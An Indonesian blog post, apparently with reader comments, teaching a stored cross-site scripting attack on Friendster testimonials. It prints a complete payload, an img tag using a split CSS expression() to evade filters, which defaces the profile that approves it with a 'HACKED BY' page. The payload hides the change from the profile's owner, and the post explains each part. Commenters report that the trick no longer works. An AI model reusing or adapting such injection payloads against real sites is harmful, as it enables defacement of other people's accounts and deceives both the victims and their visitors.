Ok kita semua tahu bahwa kesalahan FS yang paling besar adalah mengijinkan user untuk membuat code html kedalam testi, dan profile kita… langsung aja ke pembahasan yach… karena gw orang yg gak punya bakat buat merangkai kata2 indah…
_____Begin Of Testimonial______
Halo apa kabar ??? thanks yachh dah add gw…
<img src=http://mail.yahoo.com/config/login?/”" id=”mycode” style=”height:expr_/**/ession(if(pageViewerID!=pageOwnerID){document.write(‘<body bgcolor=black><b><br><br><center><font face=verdana size=4pt color=white>HACKED BY Jh3zeR…<br>Ur Account Have been Deface by Jh3zeR..<br><br>Sorry Yach…<Br>Nothing is Secure..<br><Br><br><br>nobodys servers is safe..<br><br><br>j_stage@telkom.net<br></b>’);document.title = ‘-friendster gw bajak…!!!-’}); width:expr_/**/ession(document.all.mycode.style.height=’0px’)” /></img>
_________End Of Testimonial__________
perhatikan:
<img src=http://mail.yahoo.com/config/login?/”" id=”mycode” style=”height:expr_/**/ession(
script diatas adalah tag html yg dipake untuk membuka jalan
agar _javascript yg kita inject bisa dijalankan
if(pageViewerID!=pageOwnerID)
fungsi diatas untuk mencegah agar yg punya fs gak
bisa ngliat klo profilenya udah berubah…
jadi perubahan ini cuma bisa dilihat sama orang lain,kecuali pemiliknya.
lalu,
document.write(‘
script diatas adalah script _javascript yg fungsinya untuk menuliskan tag html semau kita kedalam sebuah testi… sehingga kita bisa merubah seluruh tampilan profile org yg telah mengapprove testi kita..
Sebenarnya trik di atas bisa pake buat kepentingan lain tapi gw gak mo merusak imajinasi kalian dech… hikzz..hikzzz…

truz klw kode bwt nyembuhin gmn???
======================================================
codenya sih blum ktemu he..he tapi klo ada comment yang rada aneh maka disable dulu fitur javascript pada browsernya ..klo pake opera : tool-preference-advance-content dan firefox :tool-option-content selanjutnya hapus aja tuh comment….
apa yang telah anda tulis tersebut tidak dapat saya lakukan pada friendster.selalu muncul error.rep** trane_1906@yahoo.co.id
ya iyalah udah gak bisa.. udah dibetulin kali sama gm fs..
haduh, gw nyoba cara yang pake kode ini
Halo apa kabar ??? thanks yachh dah add gw…
<img src=http://mail.yahoo.com/config/login?/”” id=”mycode” style=”height:expr_/**/ession(if(pageViewerID!=pageOwnerID){document.write(’HACKED BY Jh3zeR…Ur Account Have been Deface by Jh3zeR..Sorry Yach…Nothing is Secure..nobodys servers is safe..j_stage@telkom.net’);document.title = ‘-friendster gw bajak…!!!-’}); width:expr_/**/ession(document.all.mycode.style.height=’0px’)” />
kok ga bisa masuk yah ke comment???
tulisannya html u entered is invalid
Javascript required